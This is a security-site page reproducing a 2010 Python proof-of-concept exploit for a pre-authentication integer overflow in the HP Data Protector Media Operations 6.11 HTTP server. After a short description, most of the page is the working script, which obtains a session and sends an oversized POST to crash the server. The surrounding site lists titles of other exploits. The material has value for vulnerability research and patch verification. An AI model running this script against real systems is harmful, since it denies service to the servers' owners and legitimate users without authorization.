首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS
来源:http://elotrolad0.blogspot.com 作者:d0lc3 发布时间:2010-10-25  

# Exploit Title: HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS
# Date: [date]: 17/09/10
# Author: d0lc3 (@rmallof http://elotrolad0.blogspot.com/)
# Software Link: http://www.hp.com
# Version: 6.11
# Tested on: Windows XP SP3 Spa
#
#Sumary:
"""
HP Data Protector Media Operations has embebed HTTP server, allowing access through
this protocol for users.

Flaw was detected on this implementation, causing remote and pre-authenticated DoS: Integer Overflow
handling string sended length through POST method.

Integer Overflow causes unexpected variable initiation (reset to 0) followed by its dereferenciation
(NUll Dereference), crashing server and thus deniying service to legitimate users.

This is not explpoitable.
"""
#PoC:

#!/usr/bin/python

import socket,sys,time,os
#global vars
neg="GET / HTTP/1.1\r\n\r\n"
lim0="Location:"      
lim1="&"
lim2="sess="
buf="SignInName="+("A"*0x8000)+"&SignInPassword=FOO&Sign+In=Log+In" # >= 0x8000 to int overflow

def CV():
 os.system("clear")
 print"\t-HP Data Protector Media Operations 6.11-"
 print"\t    -HTTP Remote Denial of Service-"
 print"\n[+] Researcher:\tRoi Mallo (@rmallof)"
 print"[+] Blog:\thttp://elotrolad0.blogspot.com/"
 print"[+] Twitter:\thttps://www.twitter.com/rmallof"
 print"\n\n"

def nego(h):         #starting connection and getting session
 s=socket.socket()
 try:
  s.connect(h)
 except:
  print"[x] Error connecting to remote host!"
  sys.exit(0)
 s.send(neg)
 time.sleep(1)
 rec=s.recv(1024)
 s.close()
 return rec

def buildPOST(s,h,p,b):        #building POST request for crashes server
 P="POST /4daction/wHandleURLs/handleSignIn?sess="+s+"&siteCode=0&lang=en& HTTP/1.1\r\n"
 P+="Host: "+h+"\r\n"
 P+="User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10\r\n"
 P+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
 P+="Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\n"
 P+="Accept-Encoding: gzip,deflate\r\n"
 P+="Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
 P+="Keep-Alive: 115\r\n"
 P+="Connection: keep-alive\r\n"
 P+="Referer: http://"+h+p+"\r\n"
 P+="Content-Type: application/x-www-form-urlencoded\r\n"
 P+="Content-Length: %s\r\n" % str(len(b))
 P+="\r\n"
 P+=b
 time.sleep(1)
 return P

def main():
 CV()  
 if len(sys.argv)!=2:
  print"\n[x] Usage: "+sys.argv[0]+" <host>\n\n"       
  sys.exit(0)
 else:
  host=sys.argv[1]
  hostd=host,80
 #1
 print"[-] Getting HTTP session..."
 r=nego(hostd)        #getting new session...
 path=r[r.index(lim0)+len(lim0)+1:r.rindex(lim1)+1]   #search for PATH
 sess=path[path.index(lim2)+len(lim2):path.index(lim1)+len(lim1)-1] #search for SESSION hash
 time.sleep(1)
 print"[+] 0k, session ="+sess
 time.sleep(1)
 #2
 s=socket.socket()
 s.connect(hostd)
 print"[-] Bulding POST [Content-Length: %d bytes]..." % len(buf)
 POST=buildPOST(sess,host,path,buf)     #build POST request with new session
 print"[+] Done, Sayonara ;)"
 s.send(POST)        #crash it 4fun&profit :)
 time.sleep(1)       
 s.close()
if __name__=="__main__":
 main()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AnyDVD <= 6.7.1.0 Denial Of Se
·Jamb CSRF Arbitrary Add a Post
·RarmaRadio v2.52 (.m3u) Denial
·GNU C library dynamic linker L
·Winamp 5.5.8.2985 (in_mod plug
·Spider Player 2.4.5 Denial of
·ARM Bindshell port 0x1337
·Altova DatabaseSpy 2011 Projec
·ARM Bind Connect UDP Port 68
·Sawmill Enterprise < v8.1.7.3
·ARM Loader Port 0x1337
·Windows Mobile 6.1 and 6.5 Dou
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved